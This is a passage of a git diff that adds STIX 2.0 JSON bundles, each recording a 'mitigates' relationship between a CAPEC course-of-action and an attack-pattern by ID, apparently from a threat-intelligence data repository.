/dev/null +++ b/capec/relationship/relationship--f0562beb-5a29-416e-bdec-f1c183db6237.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b231176b-6876-4e2e-a0e5-96aad75b2ae0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f0562beb-5a29-416e-bdec-f1c183db6237", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", + "target_ref": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f17d2dbc-4dda-4687-82f4-b1365fd82e11.json b/capec/relationship/relationship--f17d2dbc-4dda-4687-82f4-b1365fd82e11.json new file mode 100644 index 0000000000..7a8f0c5344 --- /dev/null +++ b/capec/relationship/relationship--f17d2dbc-4dda-4687-82f4-b1365fd82e11.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9447367a-521e-4667-aa0b-c6df23653e7b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f17d2dbc-4dda-4687-82f4-b1365fd82e11", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ceadbefb-d4f2-41fe-850d-4a0c2cf8bb9d", + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f18a5424-9f62-4d5d-96d0-a4fe39121c41.json b/capec/relationship/relationship--f18a5424-9f62-4d5d-96d0-a4fe39121c41.json new file mode 100644 index 0000000000..df40dcf414 --- /dev/null +++ b/capec/relationship/relationship--f18a5424-9f62-4d5d-96d0-a4fe39121c41.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--60f08039-0f7e-4321-914b-7fb1fafebd46", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f18a5424-9f62-4d5d-96d0-a4fe39121c41", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b9d4b561-62fb-4fd0-b5a9-23d92cb484ae", + "target_ref": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f1b706da-f3ca-46f8-ba74-f37311cd7149.json b/capec/relationship/relationship--f1b706da-f3ca-46f8-ba74-f37311cd7149.json new file mode 100644 index 0000000000..46c232363f --- /dev/null +++ b/capec/relationship/relationship--f1b706da-f3ca-46f8-ba74-f37311cd7149.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3c0f682e-d048-48c1-abff-5bea477caf04", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f1b706da-f3ca-46f8-ba74-f37311cd7149", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b1a513de-8052-4d43-bfe8-00511def81a1", + "target_ref": "attack-pattern--7aac9a89-6d2b-4d81-adb9-44aecaed57bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f2468477-632c-4a1b-be8c-e9ff89965aff.json b/capec/relationship/relationship--f2468477-632c-4a1b-be8c-e9ff89965aff.json new file mode 100644 index 0000000000..c501ec1159 --- /dev/null +++ b/capec/relationship/relationship--f2468477-632c-4a1b-be8c-e9ff89965aff.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1f115b6f-1e2d-4f15-b591-98291bc542be", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f2468477-632c-4a1b-be8c-e9ff89965aff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb16a6ee-aabd-45b9-a910-5731be08d987", + "target_ref": "attack-pattern--fce1eeb4-1761-4fba-a388-f45b968adf5a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f28ab700-0168-496d-9772-5d1cad1532b7.json b/capec/relationship/relationship--f28ab700-0168-496d-9772-5d1cad1532b7.json new file mode 100644 index 0000000000..8c5eb508d4 --- /dev/null +++ b/capec/relationship/relationship--f28ab700-0168-496d-9772-5d1cad1532b7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6f722743-09e8-46cb-b637-86678f8b1653", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f28ab700-0168-496d-9772-5d1cad1532b7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a8241643-15fc-4047-84fd-1d443f80b4a9", + "target_ref": "attack-pattern--3a3cdae5-f726-49c5-97d4-30ca8abf42b0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f2bbfee3-f2c6-498e-a90f-ab054df7d912.json b/capec/relationship/relationship--f2bbfee3-f2c6-498e-a90f-ab054df7d912.json new file mode 100644 index 0000000000..10c385072c --- /dev/null +++ b/capec/relationship/relationship--f2bbfee3-f2c6-498e-a90f-ab054df7d912.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e4ac0522-9646-441b-9193-78cc8232ad5a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f2bbfee3-f2c6-498e-a90f-ab054df7d912", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f33b663c-4618-4a6a-9407-e3a6753e3ce5.json b/capec/relationship/relationship--f33b663c-4618-4a6a-9407-e3a6753e3ce5.json new file mode 100644 index 0000000000..7bc837e97a --- /dev/null +++ b/capec/relationship/relationship--f33b663c-4618-4a6a-9407-e3a6753e3ce5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--650b89fc-b938-4dd2-a053-fdd9a7decbed", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f33b663c-4618-4a6a-9407-e3a6753e3ce5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c82f8ed-95b9-4f02-a8ea-b2ef0f98caa1", + "target_ref": "attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f350a84b-fb24-4e17-860a-7a8661a662a0.json b/capec/relationship/relationship--f350a84b-fb24-4e17-860a-7a8661a662a0.json new file mode 100644 index 0000000000..259b637679 --- /dev/null +++ b/capec/relationship/relationship--f350a84b-fb24-4e17-860a-7a8661a662a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--53c7925c-39fe-4c89-888a-7b68490761dd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f350a84b-fb24-4e17-860a-7a8661a662a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ad6da2b-80f2-47f6-a445-059173eb3363", + "target_ref": "attack-pattern--d9a4a5c3-d84c-4e4f-81a2-677ca21084dd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f3536738-ef95-497f-9419-9e845e1a4fe3.json b/capec/relationship/relationship--f3536738-ef95-497f-9419-9e845e1a4fe3.json new file mode 100644 index 0000000000..f60e393619 --- /dev/null +++ b/capec/relationship/relationship--f3536738-ef95-497f-9419-9e845e1a4fe3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e51ae325-1d78-42ec-a69b-473104ade20a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f3536738-ef95-497f-9419-9e845e1a4fe3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--513e1a8c-8153-40c3-8452-672f95b31666", + "target_ref": "attack-pattern--be7174ed-bde2-48ea-aa7d-bc9a7444efff", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f3d0e095-dd5e-4765-ae7e-755163a4687a.json b/capec/relationship/relationship--f3d0e095-dd5e-4765-ae7e-755163a4687a.json new file mode 100644 index 0000000000..995c96fb98 --- /dev/null +++ b/capec/relationship/relationship--f3d0e095-dd5e-4765-ae7e-755163a4687a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5da0e590-0c43-4ac2-ac26-fce3ae124a1b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f3d0e095-dd5e-4765-ae7e-755163a4687a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c52b6fac-adf1-424a-a09c-e08b395ed0a4", + "target_ref": "attack-pattern--23ef3396-6a77-4f83-9d9f-7ed7760f35b1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f42cc4b9-2a4a-4f0e-90f9-b6004443f1d0.json b/capec/relationship/relationship--f42cc4b9-2a4a-4f0e-90f9-b6004443f1d0.json new file mode 100644 index 0000000000..fb18e8b653 --- /dev/null +++ b/capec/relationship/relationship--f42cc4b9-2a4a-4f0e-90f9-b6004443f1d0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b02b2ed2-f8ae-411a-bbb0-67fc246f402b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f42cc4b9-2a4a-4f0e-90f9-b6004443f1d0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--859d96fc-2041-40a9-ad0d-abfeeda1de40", + "target_ref": "attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f47e6dc7-0c11-4423-8905-ce9233c8aa56.json b/capec/relationship/relationship--f47e6dc7-0c11-4423-8905-ce9233c8aa56.json new file mode 100644 index 0000000000..c11fe7dfba --- /dev/null +++ b/capec/relationship/relationship--f47e6dc7-0c11-4423-8905-ce9233c8aa56.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--34d755a7-537a-42dd-a956-bbe07c31ab97", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f47e6dc7-0c11-4423-8905-ce9233c8aa56", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c9a6676d-85dc-4a5f-b64e-d1f3d2eb77de", + "target_ref": "attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f4dde5ab-520a-4b4e-a483-a8f50e447dbf.json b/capec/relationship/relationship--f4dde5ab-520a-4b4e-a483-a8f50e447dbf.json new file mode 100644 index 0000000000..613c45d294 --- /dev/null +++ b/capec/relationship/relationship--f4dde5ab-520a-4b4e-a483-a8f50e447dbf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--57b43985-19ab-4925-a922-b91c7d5d6f61", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f4dde5ab-520a-4b4e-a483-a8f50e447dbf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--45a7c54b-dd25-4f55-bbb2-deae94e43cff", + "target_ref": "attack-pattern--1c60fdca-a7a5-46d2-9544-6c0b6b73818f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f4f5521b-dcf2-48f8-8087-5626b06446ca.json b/capec/relationship/relationship--f4f5521b-dcf2-48f8-8087-5626b06446ca.json new file mode 100644 index 0000000000..9fb0983b35 --- /dev/null +++ b/capec/relationship/relationship--f4f5521b-dcf2-48f8-8087-5626b06446ca.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dfb53f89-f147-45a6-9918-de7e179ef1ad", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f4f5521b-dcf2-48f8-8087-5626b06446ca", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0e72181f-5edb-4eb7-b284-c94a64e6bb32", + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f51e8b12-d41f-489c-a654-8867e6f3e015.json b/capec/relationship/relationship--f51e8b12-d41f-489c-a654-8867e6f3e015.json new file mode 100644 index 0000000000..b6b2240c94 --- /dev/null +++ b/capec/relationship/relationship--f51e8b12-d41f-489c-a654-8867e6f3e015.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9cb2f646-383a-4e21-a3f8-8e52c5bd5d88", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f51e8b12-d41f-489c-a654-8867e6f3e015", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0446a84-cd0e-4210-8bac-469a0372c375", + "target_ref": "attack-pattern--b51edcf5-b372-4b85-8155-09c49a9ebddf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f578d9fb-fe71-48f7-8fbb-d45167ed1846.json b/capec/relationship/relationship--f578d9fb-fe71-48f7-8fbb-d45167ed1846.json new file mode 100644 index 0000000000..24061906d2 --- /dev/null +++ b/capec/relationship/relationship--f578d9fb-fe71-48f7-8fbb-d45167ed1846.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d651aaf1-9220-4528-8e6b-f941940ca4f9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f578d9fb-fe71-48f7-8fbb-d45167ed1846", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--875b6de8-e5e7-4952-9130-4fe457a29e60", + "target_ref": "attack-pattern--2639a852-3832-492a-b16c-0d568ecb8fa7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f5987f26-b520-4611-9955-47308a4ab228.json b/capec/relationship/relationship--f5987f26-b520-4611-9955-47308a4ab228.json new file mode 100644 index 0000000000..0db9d0eaa8 --- /dev/null +++ b/capec/relationship/relationship--f5987f26-b520-4611-9955-47308a4ab228.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d811599d-9ae7-410e-9e3d-625ffee60274", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f5987f26-b520-4611-9955-47308a4ab228", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7de6264-3963-43d9-bb8d-db135b6ee57b", + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f5a9f1e7-823a-4866-b736-cb4ae25c5ec8.json b/capec/relationship/relationship--f5a9f1e7-823a-4866-b736-cb4ae25c5ec8.json new file mode 100644 index 0000000000..2f362f184e --- /dev/null +++ b/capec/relationship/relationship--f5a9f1e7-823a-4866-b736-cb4ae25c5ec8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2ce21508-62c4-457c-9faa-0ec6a5dffb06", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f5a9f1e7-823a-4866-b736-cb4ae25c5ec8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7959d72d-654f-4b44-bc49-1ed26d35b1d2", + "target_ref": "attack-pattern--3faacb4b-f20b-4101-b8f2-51c49cee5be4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f5b48029-c434-4493-8aed-e71719117926.json b/capec/relationship/relationship--f5b48029-c434-4493-8aed-e71719117926.json new file mode 100644 index 0000000000..8af735343d --- /dev/null +++ b/capec/relationship/relationship--f5b48029-c434-4493-8aed-e71719117926.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4cf629d2-3c2c-493f-8de3-0f777d15f9a5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f5b48029-c434-4493-8aed-e71719117926", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", + "target_ref": "attack-pattern--5d250b2b-1f3f-4a41-9cbf-7c91fb7e4c69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f5c0ea9b-986b-4c21-8bad-07b3b2877a81.json b/capec/relationship/relationship--f5c0ea9b-986b-4c21-8bad-07b3b2877a81.json new file mode 100644 index 0000000000..2847503e51 --- /dev/null +++ b/capec/relationship/relationship--f5c0ea9b-986b-4c21-8bad-07b3b2877a81.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--76bb687d-fb01-4825-8510-5e0f29e1081e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f5c0ea9b-986b-4c21-8bad-07b3b2877a81", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", + "target_ref": "attack-pattern--ef49301f-4b17-4c00-89f7-f2f06f9af9c1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f730b1cf-6be9-4267-83a3-bafb3298183d.json b/capec/relationship/relationship--f730b1cf-6be9-4267-83a3-bafb3298183d.json new file mode 100644 index 0000000000..c597bd3104 --- /dev/null +++ b/capec/relationship/relationship--f730b1cf-6be9-4267-83a3-bafb3298183d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0ea3bd0d-1eda-41f0-a014-37a0fa3c8c5a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f730b1cf-6be9-4267-83a3-bafb3298183d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c6168e3d-14cd-4b0d-95c7-84c53e4b0899", + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f7328c84-cf21-40c0-9a07-aa393b67ce63.json b/capec/relationship/relationship--f7328c84-cf21-40c0-9a07-aa393b67ce63.json new file mode 100644 index 0000000000..f45e6ca702 --- /dev/null +++ b/capec/relationship/relationship--f7328c84-cf21-40c0-9a07-aa393b67ce63.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--09973203-22fa-461f-94fc-ba322825ea83", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f7328c84-cf21-40c0-9a07-aa393b67ce63", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f6e37091-23b8-4f89-8f5a-5dedcf414a97", + "target_ref": "attack-pattern--3d9d1479-8768-4265-acc9-8e26894c6e08", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f85f68b6-6f23-4af9-83cd-87d22db28551.json b/capec/relationship/relationship--f85f68b6-6f23-4af9-83cd-87d22db28551.json new file mode 100644 index 0000000000..6ed9014add --- /dev/null +++ b/capec/relationship/relationship--f85f68b6-6f23-4af9-83cd-87d22db28551.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--41a471d3-42d7-483c-8d1e-f0107b5dd3d3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f85f68b6-6f23-4af9-83cd-87d22db28551", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--44e277ab-ef98-46e0-b905-4280ecfb32e7", + "target_ref": "attack-pattern--83a895c1-df98-4aa4-be2d-ace0108e64be", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f8ea324e-3205-4840-9f4d-882dd1653a69.json b/capec/relationship/relationship--f8ea324e-3205-4840-9f4d-882dd1653a69.json new file mode 100644 index 0000000000..39781169c2 --- /dev/null +++ b/capec/relationship/relationship--f8ea324e-3205-4840-9f4d-882dd1653a69.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c892bfe5-217e-4f28-824d-7a48a2238c89", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f8ea324e-3205-4840-9f4d-882dd1653a69", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb35cf7c-719a-45a8-abf5-fd1eda76d848", + "target_ref": "attack-pattern--67b5679d-1866-4df2-952d-b26985bd3651", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f8fcdbfa-108d-4232-b020-a5c907dc809b.json b/capec/relationship/relationship--f8fcdbfa-108d-4232-b020-a5c907dc809b.json new file mode 100644 index 0000000000..3597eb25e7 --- /dev/null +++ b/capec/relationship/relationship--f8fcdbfa-108d-4232-b020-a5c907dc809b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c3d804c5-d5ee-4948-9ad3-ce89434003b6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f8fcdbfa-108d-4232-b020-a5c907dc809b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1", + "target_ref": "attack-pattern--d9a4a5c3-d84c-4e4f-81a2-677ca21084dd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f9e4c464-be58-41c0-9a77-ccfdc854a000.json b/capec/relationship/relationship--f9e4c464-be58-41c0-9a77-ccfdc854a000.json new file mode 100644 index 0000000000..174c286e0a --- /dev/null +++ b/capec/relationship/relationship--f9e4c464-be58-41c0-9a77-ccfdc854a000.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0293ca57-fe2c-41f9-b133-bb71b6a9b749", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f9e4c464-be58-41c0-9a77-ccfdc854a000", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--060932fa-a809-49e7-9a4c-05e6c3f99f31", + "target_ref": "attack-pattern--0829aa8e-55a4-46cb-be87-43dbc49d6a5e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fa4ed481-62ad-4d79-a2fc-64104574eeff.json b/capec/relationship/relationship--fa4ed481-62ad-4d79-a2fc-64104574eeff.json new file mode 100644 index 0000000000..e3121f30c6 --- /dev/null +++ b/capec/relationship/relationship--fa4ed481-62ad-4d79-a2fc-64104574eeff.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2e277d07-7cfb-4a92-93f5-eb4c712290c4", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fa4ed481-62ad-4d79-a2fc-64104574eeff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--da64dfaa-01b4-4658-9671-e5ba690138d4", + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fad1edac-f0a5-48d7-b651-4d1eb2869a8c.json b/capec/relationship/relationship--fad1edac-f0a5-48d7-b651-4d1eb2869a8c.json new file mode 100644 index 